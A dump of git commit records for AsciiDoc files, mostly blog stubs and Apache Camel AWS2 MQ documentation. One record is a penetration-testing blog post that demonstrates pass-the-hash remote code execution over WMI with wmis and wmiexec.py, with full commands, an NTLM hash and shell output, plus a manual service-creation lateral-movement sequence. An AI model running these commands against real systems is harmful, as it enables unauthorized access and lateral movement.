Enjoy!\n\nThe Camel riders!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67f57d907921daba7f65602a308c40bb5ac2e8b6","subject":"Update 2016-03-18-Blog-Title.adoc","message":"Update 2016-03-18-Blog-Title.adoc","repos":"thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io","old_file":"_posts\/2016-03-18-Blog-Title.adoc","new_file":"_posts\/2016-03-18-Blog-Title.adoc","new_contents":"= Blog Title\n:hp-tags: Data science, GIS, Epi\n\nthis is some text","old_contents":"= Blog Title\n= this is some text","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4be47c6514600bd2a75f7ff6e8e4835960c0aee2","subject":"Update 2016-04-01-First-Post.adoc","message":"Update 2016-04-01-First-Post.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-01-First-Post.adoc","new_file":"_posts\/2016-04-01-First-Post.adoc","new_contents":"= Adoc \u8a18\u6cd5\u30b9\u30cb\u30da\u30c3\u30c8\n\n== h2\n\nhttp:\/\/github.com[Github]\n\nimage::http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg[]\n\n* hoge1\n* hoge2\n** hoge2-1\n\n*bold* +\n_italic_ +\n`monospace` +\n\n\nHOGE:: hoge\u306e\u8aac\u660e\n\n[source, ruby]\n----\ndef hoge\n \/\/ \u307b\u3052\n return if fuga.present?\n \"\u30c6\u30b9\u30c8\"\n %|\u30c6\u30b9\u30c8|\n\t\nend\n----\n\nvideo::KCylB780zSM[youtube]\n\nvideo::67480300[vimeo]\n\n\n.\u30c6\u30fc\u30d6\u30eb\u30bf\u30a4\u30c8\u30eb\n[options=\"header\"]\n|=======================\n|Col 1|Col 2 |Col 3\n|1 |Item 1 |a\n|2 |Item 2 |b\n|3 |Item 3 |c\n|=======================\n\n[format=\"csv\"]\n|======\n1,2,3,4\na,b,c,d\nA,B,C,D\n|======\n\n[quote, 'https:\/\/ja.wikipedia.org\/wiki\/%E8%BB%BD%E9%87%8F%E3%83%9E%E3%83%BC%E3%82%AF%E3%82%A2%E3%83%83%E3%83%97%E8%A8%80%E8%AA%9E[Wikipedia:\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e]']\n____\n\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\uff08\u3051\u3044\u308a\u3087\u3046\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u3052\u3093\u3054\u3001\n\u82f1\u8a9e: lightweight markup language\uff09\u306f\u3001\n\u4eba\u9593\u304c\u30b7\u30f3\u30d7\u30eb\u306a\u30c6\u30ad\u30b9\u30c8\u30a8\u30c7\u30a3\u30bf\u3092\u4f7f\u3063\u3066\u306e\n\u5165\u529b\u304c\u5bb9\u6613\u306b\u306a\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u305f\u3001\n\u7c21\u6f54\u306a\u6587\u6cd5\u3092\u3082\u3064\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\u3067\u3042\u308b\u3002\n____\n\n\n++++\n<ruby>\n <rb>\u4e9c\u7c73\u5229\u52a0<\/rb>\n <rp>\uff08<\/rp>\n <rt> \u30a2\u30e1\u30ea\u30ab<\/rt>\n <rp> \uff09<\/rp>\n<\/ruby>\n++++\n\n\/\/ Meta\u60c5\u5831\n:hp-alt-title: First Post\n:hp-tags: adoc, sandbox, snippet\n:published_at: 2016-04-01\n:hp-image: http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg\n","old_contents":"= Adoc \u8a18\u6cd5\u30b9\u30cb\u30da\u30c3\u30c8\n\n== h2\n\nhttp:\/\/github.com[Github]\n\nimage::http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg[]\n\n* hoge1\n* hoge2\n** hoge2-1\n\n*bold* +\n_italic_ +\n`monospace` +\n\n\nHOGE:: hoge\u306e\u8aac\u660e\n\n[source, ruby]\n----\ndef hoge\n \/\/ \u307b\u3052\n return if fuga.present?\n \"\u30c6\u30b9\u30c8\"\n %|\u30c6\u30b9\u30c8|\n\t\nend\n----\n\n[source, 
python]\n----\ninclude::test.py[]\n----\n\nvideo::KCylB780zSM[youtube]\n\nvideo::67480300[vimeo]\n\n\n.\u30c6\u30fc\u30d6\u30eb\u30bf\u30a4\u30c8\u30eb\n[options=\"header\"]\n|=======================\n|Col 1|Col 2 |Col 3\n|1 |Item 1 |a\n|2 |Item 2 |b\n|3 |Item 3 |c\n|=======================\n\n[format=\"csv\"]\n|======\n1,2,3,4\na,b,c,d\nA,B,C,D\n|======\n\n[quote, 'https:\/\/ja.wikipedia.org\/wiki\/%E8%BB%BD%E9%87%8F%E3%83%9E%E3%83%BC%E3%82%AF%E3%82%A2%E3%83%83%E3%83%97%E8%A8%80%E8%AA%9E[Wikipedia:\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e]']\n____\n\u8efd\u91cf\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\uff08\u3051\u3044\u308a\u3087\u3046\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u3052\u3093\u3054\u3001\n\u82f1\u8a9e: lightweight markup language\uff09\u306f\u3001\n\u4eba\u9593\u304c\u30b7\u30f3\u30d7\u30eb\u306a\u30c6\u30ad\u30b9\u30c8\u30a8\u30c7\u30a3\u30bf\u3092\u4f7f\u3063\u3066\u306e\n\u5165\u529b\u304c\u5bb9\u6613\u306b\u306a\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u305f\u3001\n\u7c21\u6f54\u306a\u6587\u6cd5\u3092\u3082\u3064\u30de\u30fc\u30af\u30a2\u30c3\u30d7\u8a00\u8a9e\u3067\u3042\u308b\u3002\n____\n\n\n++++\n<ruby>\n <rb>\u4e9c\u7c73\u5229\u52a0<\/rb>\n <rp>\uff08<\/rp>\n <rt> \u30a2\u30e1\u30ea\u30ab<\/rt>\n <rp> \uff09<\/rp>\n<\/ruby>\n++++\n\n\/\/ Meta\u60c5\u5831\n:hp-alt-title: First Post\n:hp-tags: adoc, sandbox, snippet\n:published_at: 2016-04-01\n:hp-image: http:\/\/blog.kozyty.com\/images\/robot-916284_1280.jpg\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0172ccaa70685b9211309970bd3f2cb5993935e1","subject":"Deleted _posts\/2016-10-31-First-post.adoc","message":"Deleted _posts\/2016-10-31-First-post.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2016-10-31-First-post.adoc","new_file":"_posts\/2016-10-31-First-post.adoc","new_contents":"","old_contents":"= First post\n:hp-tags: HubPress, Blog, Open Source\n\nThis is my first post using hubpress","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"709efab9cc28d59210fee0de6de2e68f09b9219a","subject":"Update 2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","message":"Update 2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","new_file":"_posts\/2014-04-19-Executing-code-via-SMB-DCOM-without-PSEXEC.adoc","new_contents":"= Executing code via SMB \/ DCOM without PSEXEC\n:hp-tags: wmi, wmis, impacket\n\nPSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all \"psexec\" tools work is:\n\n 1. (_Optional_) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal's tool) to the ADMIN$ share\n 2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.\n 3. Run the service\n 4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.\n\nNow, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.\n\nAs you might imagine, thats not the best thing for us on the offensive side of infosec. 
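To see just how noisy that flow is, the same four steps can be reproduced by hand with nothing but built-in Windows tooling (a rough sketch only; the target, credentials, file and service names below are made up for illustration):

```
net use \\TARGET\ADMIN$ /user:CORP\admin P@ssw0rd
copy payload.exe \\TARGET\ADMIN$\
sc \\TARGET create testsvc binPath= "C:\Windows\payload.exe"
sc \\TARGET start testsvc
sc \\TARGET stop testsvc
sc \\TARGET delete testsvc
del \\TARGET\ADMIN$\payload.exe
```

Every one of those steps leaves its own event log entries and disk artifacts behind.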
Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: link:\/blog\/2013\/06\/10\/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1\/[HERE] and link:\/blog\/2013\/10\/06\/dumping-a-domain-worth-of-passwords-with-mimikatz\/[HERE]\n\nThe downside to using WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn't use to be an available option.\n\nThat has changed with the \"wmis\" package on Kali Linux that incorporates the http:\/\/passing-the-hash.blogspot.com\/2013\/07\/WMIS-PowerSploit-Shells.html[\"Pass-the-Hash for 15 years toolkit\"].\n\n(There is a slight problem where you have to play with it a bit to get it working on 64-bit Kali)\n\nThe other solution is supplied as an example in the http:\/\/corelabs.coresecurity.com\/index.php?module=Wiki&action=view&type=tool&name=Impacket[Impacket library] https:\/\/code.google.com\/p\/impacket\/source\/browse\/trunk\/examples\/wmiexec.py[\"wmiexec.py\"]. In my experience there are a few features that make it the better option.\n\n1. Installing it on a random VPS is dead simple and doesn't need the Kali or Debian\/Ubuntu repos to get right.\n2. It defaults to a \"semi-interactive shell\" which writes and reads output from the ADMIN$ share by default. Something I would normally have to do manually with a bunch of tools.\n3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write\/read.\n\nEnough crazy talk; here is an example usage of each:\n\n## WMIS\n\n### Usage:\n\n```\nroot@wpad:~# wmis\nUsage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]\n [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]\n [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]\n [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]\n [-U|--user=[DOMAIN\\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]\n [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]\n [--use-security-mechanisms=STRING] [-V|--version]\n \/\/host\n\nExample: wmis -U [domain\/]adminuser%password \/\/host cmd.exe \/c dir c:\\ > c:\\windows\\temp\\output.txt \n```\n\n## Example:\n```\nroot@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 \/\/172.16.102.141 calc.exe\nHASH PASS: Substituting user supplied NTLM HASH...\nHASH PASS: Substituting user supplied NTLM HASH...\n[wmi\/wmis.c:172:main()] 1: calc.exe\nNTSTATUS: NT_STATUS_OK - Success\n```\n\n\n\n## wmiexec.py\n\nUsing a password, but with hashes you just tell it `-hashes`:\n\n### Usage:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py \nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]\n target [command [command ...]]\n\npositional arguments:\n target [domain\/][username[:password]@]<address>\n command command to execute at the target. 
If empty it will\n launch a semi-interactive shell\n\noptional arguments:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n C$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n\nauthentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n\n```\n### Example:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141\nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nSMBv2.1 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\nC:\\>dir\n Volume in drive C has no label.\n Volume Serial Number is 5CCA-B528\n\n Directory of C:\\\n\n07\/13\/2009 11:20 PM <DIR> PerfLogs\n10\/07\/2013 03:26 PM <DIR> Program Files\n07\/14\/2009 01:08 AM <DIR> Program Files (x86)\n04\/25\/2014 02:21 AM <DIR> Users\n05\/11\/2014 03:39 PM <DIR> Windows\n 0 File(s) 0 bytes\n 5 Dir(s) 52,884,389,888 bytes free\n\nC:\\>\n\n```\n\n","old_contents":"---\nlayout: post\ntitle: \"Executing code via SMB \/ DCOM without PSEXEC\"\ndate: 2014-04-19 21:36:21 -0400\ncomments: true\ncategories:\n- wmi\n- wmis\n- impacket\n---\n\nPSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all \"psexec\" tools work is:\n\n 1. (_Optional_) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal's tool) to the ADMIN$ share\n 2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.\n 3. Run the service\n 4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.\n\nNow, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.\n\nAs you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: [HERE](\/blog\/2013\/06\/10\/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1\/) and [HERE](\/blog\/2013\/10\/06\/dumping-a-domain-worth-of-passwords-with-mimikatz\/)\n\nThe downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn't used to be an available option.\n\nThat has changed with the \"wmis\" package on Kali Linux that incorporates the [\"Pass-the-Hash for 15 years toolkit\"](http:\/\/passing-the-hash.blogspot.com\/2013\/07\/WMIS-PowerSploit-Shells.html)\n\n(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)\n\nThe other solution is supplied as an example in the [Impacket library](http:\/\/corelabs.coresecurity.com\/index.php?module=Wiki&action=view&type=tool&name=Impacket) [\"wmiexec.py\"](https:\/\/code.google.com\/p\/impacket\/source\/browse\/trunk\/examples\/wmiexec.py). In my experience there are a few features that make it the better option.\n\n1. Installing it on a random VPS is dead simple and doesn't need the Kali repos to get right, nor Debian\/Ubuntu.\n2. It defaults to an \"semi-interactive shell\" which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools\n3. 
As with the WMIS package, it allows you to just create a process without the ADMIN$ write\/read.\n\nEnough crazy talk here is an example usage of each:\n\n## WMIS\n\n### Usage:\n\n```\nroot@wpad:~# wmis\nUsage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]\n [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]\n [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]\n [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]\n [-U|--user=[DOMAIN\\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]\n [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]\n [--use-security-mechanisms=STRING] [-V|--version]\n \/\/host\n\nExample: wmis -U [domain\/]adminuser%password \/\/host cmd.exe \/c dir c:\\ > c:\\windows\\temp\\output.txt \n```\n\n## Example:\n```\nroot@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 \/\/172.16.102.141 calc.exe\nHASH PASS: Substituting user supplied NTLM HASH...\nHASH PASS: Substituting user supplied NTLM HASH...\n[wmi\/wmis.c:172:main()] 1: calc.exe\nNTSTATUS: NT_STATUS_OK - Success\n```\n\n\n\n## wmiexec.py\n\nUsing a password, but with hashes you just tell it `-hashes` :\n\n### Usage:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py \nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]\n target [command [command ...]]\n\npositional arguments:\n target [domain\/][username[:password]@]<address>\n command command to execute at the target. If empty it will\n launch a semi-interactive shell\n\noptional arguments:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n C$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n\nauthentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n\n```\n### Example:\n```\nroot@wpad:~\/impacket\/examples# .\/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141\nImpacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies\n\nSMBv2.1 dialect used\n[!] 
Launching semi-interactive shell - Careful what you execute\nC:\\>dir\n Volume in drive C has no label.\n Volume Serial Number is 5CCA-B528\n\n Directory of C:\\\n\n07\/13\/2009 11:20 PM <DIR> PerfLogs\n10\/07\/2013 03:26 PM <DIR> Program Files\n07\/14\/2009 01:08 AM <DIR> Program Files (x86)\n04\/25\/2014 02:21 AM <DIR> Users\n05\/11\/2014 03:39 PM <DIR> Windows\n 0 File(s) 0 bytes\n 5 Dir(s) 52,884,389,888 bytes free\n\nC:\\>\n\n```\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"08080a460df72ad28843d4912ab474a6e21a64a9","subject":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","message":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_contents":"= Welcome to Mirum Singapore Agency Showcase\n:published_at: 2015-08-03\n:hp-tags: HubPress, Blog, Open Source\n\n\n\nvideo::48UgQmvq8VA[youtube]\n\n== Small Image\nimage::https:\/\/farm6.staticflickr.com\/5493\/14496162345_872e58358f_m.jpg#small[small]\n== Normal Image\nimage::https:\/\/farm6.staticflickr.com\/5534\/14492781111_042ae8b40d_c.jpg[Normal]\n== Large Image\nimage::https:\/\/farm3.staticflickr.com\/2934\/14050612097_57c8dab90c_b.jpg#large[Large]\n== Full width Image\nimage::https:\/\/farm8.staticflickr.com\/7230\/13836614065_866c50b9d0_k.jpg#full[Full]\n\n\n=== Photo Gallery\nimage::http:\/\/photos-c.ak.instagram.com\/hphotos-ak-xap1\/10299624_651870351533978_698775745_n.jpg[Gallery 1] image::http:\/\/photos-h.ak.instagram.com\/hphotos-ak-xpa1\/10349783_1421830468085423_1781757588_n.jpg[Gallery 2] image::http:\/\/photos-f.ak.instagram.com\/hphotos-ak-xpf1\/10326473_685992338134029_1330967718_n.jpg[Gallery 3] image::http:\/\/photos-g.ak.instagram.com\/hphotos-ak-xpa1\/10349270_623564424403646_1080162466_n.jpg[Gallery 4]","old_contents":"= Welcome to Mirum Singapore Agency Showcase\n:published_at: 2015-08-03\n:hp-tags: HubPress, Blog, Open Source\n\n\n\nvideo::[48UgQmvq8VA][youtube]\n\n== Small Image\nimage::https:\/\/farm6.staticflickr.com\/5493\/14496162345_872e58358f_m.jpg#small[small]\n== Normal Image\nimage::https:\/\/farm6.staticflickr.com\/5534\/14492781111_042ae8b40d_c.jpg[Normal]\n== Large Image\nimage::https:\/\/farm3.staticflickr.com\/2934\/14050612097_57c8dab90c_b.jpg#large[Large]\n== Full width Image\nimage::https:\/\/farm8.staticflickr.com\/7230\/13836614065_866c50b9d0_k.jpg#full[Full]\n\n\n=== Photo Gallery\nimage::http:\/\/photos-c.ak.instagram.com\/hphotos-ak-xap1\/10299624_651870351533978_698775745_n.jpg[Gallery 1] image::http:\/\/photos-h.ak.instagram.com\/hphotos-ak-xpa1\/10349783_1421830468085423_1781757588_n.jpg[Gallery 2] image::http:\/\/photos-f.ak.instagram.com\/hphotos-ak-xpf1\/10326473_685992338134029_1330967718_n.jpg[Gallery 3] image::http:\/\/photos-g.ak.instagram.com\/hphotos-ak-xpa1\/10349270_623564424403646_1080162466_n.jpg[Gallery 4]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"28818fcc83ff7e25e146c5b113127dc091dd1bf4","subject":"CAMEL-14463 - Create an AWS-MQ component based on SDK v2, regen docs","message":"CAMEL-14463 - Create an AWS-MQ component based on SDK v2, regen 
docs\n","repos":"pax95\/camel,DariusX\/camel,adessaigne\/camel,zregvart\/camel,tdiesler\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,christophd\/camel,DariusX\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,alvinkwekel\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,christophd\/camel,apache\/camel,zregvart\/camel,DariusX\/camel,mcollovati\/camel,christophd\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,pax95\/camel,christophd\/camel,apache\/camel,nikhilvibhav\/camel,ullgren\/camel,nicolaferraro\/camel,mcollovati\/camel,cunningt\/camel,tdiesler\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,alvinkwekel\/camel,tadayosi\/camel,zregvart\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,ullgren\/camel,apache\/camel,ullgren\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,mcollovati\/camel,adessaigne\/camel,adessaigne\/camel,ullgren\/camel,nicolaferraro\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-mq-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-mq-component.adoc","new_contents":"[[aws2-mq-component]]\n= AWS 2 MQ Component\n:page-source: components\/camel-aws2-mq\/src\/main\/docs\/aws2-mq-component.adoc\n\n*Since Camel 3.1*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe MQ component supports create, run, start, stop and terminate\nhttps:\/\/aws.amazon.com\/amazon-mq\/[AWS MQ] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon MQ. More information is available at\nhttps:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ].\n\n[NOTE]\n====\nThe AWS2 MQ component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-mq:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 MQ component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | The AWS MQ default configuration | | MQ2Configuration\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *region* (producer) | The region in which MQ client needs to work | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. 
Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 MQ endpoint is configured using URI syntax:\n\n----\naws2-mq:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *amazonMqClient* (producer) | To use an existing configured AmazonMQClient as client | | MqClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. It can be listBrokers, createBroker, deleteBroker | | MQ2Operations\n| *proxyHost* (producer) | To define a proxy host when instantiating the MQ client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the MQ client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the MQ client | HTTPS | Protocol\n| *region* (producer) | The region in which MQ client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1). You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
== Automatic detection of MqClient client in registry\n\nThe component is capable of detecting the presence of an MqClient bean in the registry.\nIf it's the only instance of that type, it will be used as the client and you won't have to define it as a URI parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\nDependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-mq<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n","old_contents":"[[aws2-mq-component]]\n= AWS 2 MQ Component\n:page-source: components\/camel-aws2-mq\/src\/main\/docs\/aws2-mq-component.adoc\n\n*Since Camel 3.1*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe MQ component supports create, run, start, stop and terminate\nhttps:\/\/aws.amazon.com\/amazon-mq\/[AWS MQ] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon MQ. 
More information is available at\nhttps:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ].\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-mq:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 MQ component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | The AWS MQ default configuration | | MQ2Configuration\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *region* (producer) | The region in which MQ client needs to work | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 MQ endpoint is configured using URI syntax:\n\n----\naws2-mq:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *amazonMqClient* (producer) | To use a existing configured AmazonMQClient as client | | MqClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be 